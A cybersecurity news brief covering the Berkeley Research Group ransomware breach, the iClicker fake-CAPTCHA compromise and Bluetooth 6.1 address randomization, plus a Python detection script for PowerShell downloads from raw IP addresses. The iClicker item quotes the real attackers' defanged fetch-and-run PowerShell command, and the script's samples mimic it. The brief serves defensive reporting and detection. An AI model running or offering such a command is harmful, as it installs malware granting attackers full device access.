Svoboda Cybersecurity Brief May 12, 2025
Data breach exposes Catholic clergy abuse survivors’ information
The Berkeley Research Group (BRG) suffered a ransomware attack on March 2, 2025, potentially exposing sensitive data of diocesan sex abuse survivors involved in bankruptcy lawsuits. Attackers gained access via Microsoft Teams phishing, deployed Chaos ransomware, and were paid an undisclosed ransom despite providing a “destruction log.” The Department of Justice criticized BRG’s delayed notification to affected parties, with some clients only informed on April 28.
Source: DataBreaches
iClicker website compromised to distribute malware via fake CAPTCHA
Between April 12-16, 2025, the iClicker student engagement platform’s website was hacked to display a fake CAPTCHA prompting users to execute a PowerShell script (iwr http://67.217.228[.]14:8080). The script delivered malware granting attackers full device access, though some users received a legitimate Microsoft Visual C++ Redistributable as a decoy. iClicker downplayed the incident and obscured its security bulletin with a noindex tag.
Impact: Compromised devices risk credential theft, ransomware, and further network breaches.
Mitigation: Affected users should run security scans, change all passwords, and use a password manager.
Source: BleepingComputer
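Detection sketch for the command shape reported above (an added example, not taken from iClicker's bulletin or the BleepingComputer report): it flags PowerShell processes whose command line uses a download cmdlet against a raw-IP URL. The event field names, host names and sample events are constructed, and the sample addresses come from documentation ranges.

```python
import ipaddress
import re

# Download cmdlets and the aliases Windows PowerShell maps to them.
DOWNLOADER = re.compile(
    r"(?<![\w-])(iwr|invoke-webrequest|irm|invoke-restmethod|curl|wget)(?![\w-])",
    re.I)
# http(s) URL whose host is a dotted quad, with optional port and path.
RAW_IP_URL = re.compile(
    r"https?://((?:\d{1,3}\.){3}\d{1,3})(?::\d{1,5})?[^\s'\"|;)]*", re.I)
PS_IMAGES = {"powershell.exe", "pwsh.exe"}


def refang(text):
    """Undo common defanging so report strings and raw logs hit the same rule."""
    return text.replace("[.]", ".").replace("hxxp", "http")


def raw_ip_downloads(command_line):
    """Return raw-IP URLs fetched by a download cmdlet in this command line."""
    cmd = refang(command_line)
    if not DOWNLOADER.search(cmd):
        return []
    urls = []
    for match in RAW_IP_URL.finditer(cmd):
        try:
            ipaddress.ip_address(match.group(1))  # reject 999.1.1.1 and the like
        except ValueError:
            continue
        urls.append(match.group(0))
    return urls


def triage(events):
    """Yield (host, url) pairs for PowerShell process-creation events only."""
    return [(e["host"], url) for e in events
            if e["image"].lower() in PS_IMAGES
            for url in raw_ip_downloads(e["cmd"])]


# Constructed process-creation events (field names are assumptions).
SAMPLE_EVENTS = [
    {"host": "lab-pc-01", "image": "powershell.exe",
     "cmd": 'powershell -c "iwr http://203.0.113.7:8080"'},
    {"host": "lab-pc-02", "image": "powershell.exe",
     "cmd": 'powershell -c "iwr https://example.com/setup.ps1 -OutFile s.ps1"'},
    {"host": "lab-pc-03", "image": "chrome.exe",
     "cmd": "chrome.exe http://203.0.113.7:8080"},
    {"host": "lab-pc-04", "image": "pwsh.exe",
     "cmd": "pwsh -c Invoke-WebRequest -Uri hxxp://198.51.100[.]23/a -OutFile a"},
]

if __name__ == "__main__":
    for host, url in triage(SAMPLE_EVENTS):
        print(f"{host}: PowerShell download from raw IP {url}")
```

Only lab-pc-01 and lab-pc-04 are reported: the download from a named host and the browser visit to the same address are ignored.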
Bluetooth 6.1 introduces randomized RPA timing to enhance privacy
Bluetooth SIG’s Core Specification 6.1 adds randomized Resolvable Private Address (RPA) updates (8-15 mins by default) to mitigate correlation attacks. The update also improves power efficiency by allowing controllers to handle RPA generation autonomously. Hardware adoption is expected by 2026, with full feature rollout likely delayed.
Source: BleepingComputer